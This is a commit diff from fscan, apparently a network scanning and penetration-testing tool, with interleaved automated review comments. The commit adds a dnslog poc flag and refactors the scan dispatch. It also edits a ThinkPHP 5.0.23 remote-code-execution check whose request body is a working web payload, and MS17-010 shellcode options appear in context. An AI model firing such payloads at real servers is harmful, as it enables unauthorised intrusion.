mirror of https://github.com/qwqdanchun/fscan.git
增加-dns参数启用dnslog poc
parent
9b0f12c31a
commit
98569648bb
|
@ -1,7 +1,6 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/WebScan/lib"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
|
@ -21,6 +20,8 @@ func Scan(info common.HostInfo) {
|
|||
lib.Inithttp(common.Pocinfo)
|
||||
var ch = make(chan struct{}, common.Threads)
|
||||
var wg = sync.WaitGroup{}
|
||||
web := strconv.Itoa(common.PORTList["web"])
|
||||
ms17010 := strconv.Itoa(common.PORTList["ms17010"])
|
||||
if len(Hosts) > 0 || len(common.HostPort) > 0 {
|
||||
if common.IsPing == false && len(Hosts) > 0 {
|
||||
Hosts = CheckLive(Hosts, common.Ping)
|
||||
|
@ -30,6 +31,7 @@ func Scan(info common.HostInfo) {
|
|||
common.LogWG.Wait()
|
||||
return
|
||||
}
|
||||
common.GC()
|
||||
var AlivePorts []string
|
||||
if common.Scantype == "webonly" {
|
||||
AlivePorts = NoPortScan(Hosts, info.Ports)
|
||||
|
@ -47,6 +49,7 @@ func Scan(info common.HostInfo) {
|
|||
common.HostPort = nil
|
||||
fmt.Println("[*] AlivePorts len is:", len(AlivePorts))
|
||||
}
|
||||
common.GC()
|
||||
var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
|
||||
for _, port := range common.PORTList {
|
||||
severports = append(severports, strconv.Itoa(port))
|
||||
|
@ -56,31 +59,30 @@ func Scan(info common.HostInfo) {
|
|||
info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
|
||||
if common.Scantype == "all" || common.Scantype == "main" {
|
||||
switch {
|
||||
case info.Ports == "135":
|
||||
AddScan(info.Ports, info, ch, &wg) //findnet
|
||||
case info.Ports == "445":
|
||||
AddScan(ms17010, info, &ch, &wg) //ms17010
|
||||
//AddScan(info.Ports, info, ch, &wg) //smb
|
||||
AddScan("1000001", info, ch, &wg) //ms17010
|
||||
//AddScan("1000002", info, ch, &wg) //smbghost
|
||||
case info.Ports == "9000":
|
||||
AddScan(info.Ports, info, ch, &wg) //fcgiscan
|
||||
AddScan("1000003", info, ch, &wg) //http
|
||||
AddScan(web, info, &ch, &wg) //http
|
||||
AddScan(info.Ports, info, &ch, &wg) //fcgiscan
|
||||
case IsContain(severports, info.Ports):
|
||||
AddScan(info.Ports, info, ch, &wg) //plugins scan
|
||||
AddScan(info.Ports, info, &ch, &wg) //plugins scan
|
||||
default:
|
||||
AddScan("1000003", info, ch, &wg) //webtitle
|
||||
AddScan(web, info, &ch, &wg) //webtitle
|
||||
}
|
||||
} else {
|
||||
port, _ := common.PORTList[common.Scantype]
|
||||
scantype := strconv.Itoa(port)
|
||||
AddScan(scantype, info, ch, &wg)
|
||||
scantype := strconv.Itoa(common.PORTList[common.Scantype])
|
||||
AddScan(scantype, info, &ch, &wg)
|
||||
}
|
||||
}
|
||||
}
|
||||
common.GC()
|
||||
for _, url := range common.Urls {
|
||||
info.Url = url
|
||||
AddScan("1000003", info, ch, &wg)
|
||||
AddScan(web, info, &ch, &wg)
|
||||
}
|
||||
common.GC()
|
||||
wg.Wait()
|
||||
common.LogWG.Wait()
|
||||
close(common.Results)
|
||||
|
@ -89,35 +91,26 @@ func Scan(info common.HostInfo) {
|
|||
|
||||
var Mutex = &sync.Mutex{}
|
||||
|
||||
func AddScan(scantype string, info common.HostInfo, ch chan struct{}, wg *sync.WaitGroup) {
|
||||
func AddScan(scantype string, info common.HostInfo, ch *chan struct{}, wg *sync.WaitGroup) {
|
||||
*ch <- struct{}{}
|
||||
wg.Add(1)
|
||||
go func() {
|
||||
Mutex.Lock()
|
||||
common.Num += 1
|
||||
Mutex.Unlock()
|
||||
ScanFunc(PluginList, scantype, &info)
|
||||
ScanFunc(&scantype, &info)
|
||||
Mutex.Lock()
|
||||
common.End += 1
|
||||
Mutex.Unlock()
|
||||
<-ch
|
||||
wg.Done()
|
||||
<-*ch
|
||||
}()
|
||||
ch <- struct{}{}
|
||||
}
|
||||
|
||||
func ScanFunc(m map[string]interface{}, name string, infos ...interface{}) (result []reflect.Value, err error) {
|
||||
f := reflect.ValueOf(m[name])
|
||||
if len(infos) != f.Type().NumIn() {
|
||||
err = errors.New("The number of infos is not adapted ")
|
||||
fmt.Println(err.Error())
|
||||
return result, nil
|
||||
}
|
||||
in := make([]reflect.Value, len(infos))
|
||||
for k, info := range infos {
|
||||
in[k] = reflect.ValueOf(info)
|
||||
}
|
||||
result = f.Call(in)
|
||||
return result, nil
|
||||
func ScanFunc(name *string, info *common.HostInfo) {
|
||||
f := reflect.ValueOf(PluginList[*name])
|
||||
in := []reflect.Value{reflect.ValueOf(info)}
|
||||
f.Call(in)
|
||||
}
|
||||
|
||||
func IsContain(items []string, item string) bool {
|
||||
|
|
|
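Review bot: The rewritten ScanFunc at the end of the section drops the only sanity check the old version had, so a scantype with no entry in PluginList turns into `reflect.ValueOf(nil)` and `f.Call` panics inside AddScan's goroutine, which has no recover and therefore takes the whole scan down; guard the lookup before calling, e.g. `if !f.IsValid() || f.Kind() != reflect.Func { fmt.Println("[-] no plugin registered for", *name); return }`. The new `ch *chan struct{}` and `name *string` parameters add indirection without benefit, because a channel value already refers to the shared channel and the string is only read, so `chan struct{}` and `string` would keep every call site simpler. In AddScan, `wg.Done()` now runs before `<-*ch`, so `wg.Wait()` in Scan can return while goroutines still hold semaphore slots; releasing the slot first and then calling `wg.Done()` keeps the counter and the semaphore in step. The `//findnet` call under `case info.Ports == "135"` still appears to pass `ch` rather than `&ch`, which would not compile against the new signature; if that line is genuinely unchanged it needs the same update as its neighbours. IsContain's body runs past the end of the section.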
@ -82,7 +82,9 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
|
|||
for _, item := range p.Set {
|
||||
k, expression := item.Key, item.Value
|
||||
if expression == "newReverse()" {
|
||||
return false, nil, ""
|
||||
if !common.DnsLog {
|
||||
return false, nil, ""
|
||||
}
|
||||
variableMap[k] = newReverse()
|
||||
continue
|
||||
}
|
||||
|
|
|
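Review bot: The new `if !common.DnsLog` branch returns `false, nil, ""`, the same triple a genuinely negative check produces, so a poc that was skipped because `-dns` is off is indistinguishable in the results from a poc that ran and found nothing; at minimum a comment should say so, `// pocs that need a dnslog callback are skipped (reported as not vulnerable) unless -dns is set`, and a distinct sentinel error would let the caller log the skip separately. The check sits inside the `p.Set` loop, so it is only reached for pocs whose set block contains `newReverse()`, which the comment should state as well. executePoc begins and ends outside the hunk.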
@ -1,6 +1,4 @@
|
|||
name: poc-yaml-thinkphp5023-method-rce
|
||||
set:
|
||||
rand: randomLowercase(10)
|
||||
groups:
|
||||
poc1:
|
||||
- method: POST
|
||||
|
@ -8,9 +6,9 @@ groups:
|
|||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
_method=__construct&filter[]=var_dump&method=GET&get[]={{rand}}
|
||||
_method=__construct&filter[]=printf&method=GET&get[]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu
|
||||
expression: |
|
||||
response.body.bcontains(bytes(rand))
|
||||
response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu")
|
||||
poc2:
|
||||
- method: POST
|
||||
path: /index.php?s=captcha
|
||||
|
|
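Review bot: The first hunk deletes the `set:` block that defined `rand`, but the second hunk stops at poc2's first request and does not show whether poc2 still references `{{rand}}` or `bytes(rand)` further down; if it does, the template now refers to an undefined variable and the whole poc file fails to load. Before merging, confirm that every remaining use of `rand` below the hunk was also replaced, or keep the `set:` block. The rest of poc2 continues past the hunk.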
|
@ -99,6 +99,7 @@ var (
|
|||
)
|
||||
|
||||
var (
|
||||
DnsLog bool
|
||||
PocNum int
|
||||
PocFull bool
|
||||
CeyeDomain string
|
||||
|
|
|
@ -10,13 +10,17 @@ import (
|
|||
func init() {
|
||||
go func() {
|
||||
for {
|
||||
runtime.GC()
|
||||
debug.FreeOSMemory()
|
||||
GC()
|
||||
time.Sleep(10 * time.Second)
|
||||
}
|
||||
}()
|
||||
}
|
||||
|
||||
func GC() {
|
||||
runtime.GC()
|
||||
debug.FreeOSMemory()
|
||||
}
|
||||
|
||||
func Banner() {
|
||||
banner := `
|
||||
___ _
|
||||
|
@ -72,6 +76,7 @@ func Flag(Info *HostInfo) {
|
|||
flag.StringVar(&Socks5Proxy, "socks5", "", "set socks5 proxy, will be used in tcp connection, timeout setting will not work")
|
||||
flag.StringVar(&Cookie, "cookie", "", "set poc cookie,-cookie rememberMe=login")
|
||||
flag.Int64Var(&WebTimeout, "wt", 5, "Set web timeout")
|
||||
flag.BoolVar(&DnsLog, "dns", false, "using dnslog poc")
|
||||
flag.IntVar(&PocNum, "num", 20, "poc rate")
|
||||
flag.StringVar(&SC, "sc", "", "ms17 shellcode,as -sc add")
|
||||
flag.Parse()
|
||||
|
|
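Review bot: The new exported `GC` in the first hunk has no doc comment; `// GC forces a garbage collection and returns freed heap memory to the OS; the loop started in init calls it every 10 seconds.` would document both the function and why init calls it. The `-dns` help text `"using dnslog poc"` reads as a status rather than a description; `"enable pocs that need a dnslog callback"` says what the flag does. Flag's body continues outside the hunk.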
1
go.mod
1
go.mod
|
@ -19,7 +19,6 @@ require (
|
|||
golang.org/x/text v0.3.6
|
||||
google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0
|
||||
gopkg.in/yaml.v2 v2.4.0
|
||||
gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b // indirect
|
||||
)
|
||||
|
||||
replace github.com/tomatome/grdp v0.0.0-20211231062539-be8adab7eaf3 => github.com/shadow1ng/grdp v1.0.3
|
||||
|
|
5
go.sum
5
go.sum
|
@ -50,8 +50,6 @@ github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7
|
|||
github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4=
|
||||
github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo=
|
||||
github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4IgpuI1SZQ=
|
||||
github.com/geoffgarside/ber v1.1.0 h1:qTmFG4jJbwiSzSXoNJeHcOprVzZ8Ulde2Rrrifu5U9w=
|
||||
github.com/geoffgarside/ber v1.1.0/go.mod h1:jVPKeCbj6MvQZhwLYsGwaGI52oUorHoHKNecGT85ZCc=
|
||||
github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
|
||||
github.com/go-gl/gl v0.0.0-20181026044259-55b76b7df9d2/go.mod h1:482civXOzJJCPzJ4ZOX/pwvXBWSnzD4OKMdH4ClKGbk=
|
||||
github.com/go-gl/gl v0.0.0-20190320180904-bf2b1f2f34d7/go.mod h1:482civXOzJJCPzJ4ZOX/pwvXBWSnzD4OKMdH4ClKGbk=
|
||||
|
@ -255,7 +253,6 @@ golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8U
|
|||
golang.org/x/crypto v0.0.0-20190605123033-f99c8df09eb5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
|
||||
golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
|
||||
golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
|
||||
golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4=
|
||||
golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a h1:kr2P4QFmQr29mSLA43kwrOcgcReGTfbE9N577tCTuBc=
|
||||
|
@ -331,6 +328,8 @@ golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7w
|
|||
golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210423082822-04245dca01da h1:b3NXsE2LusjYGGjL5bxEVZZORm/YEFFrWFjR8eFrw/c=
|
||||
golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E=
|
||||
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
|
||||
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
|
||||
|
|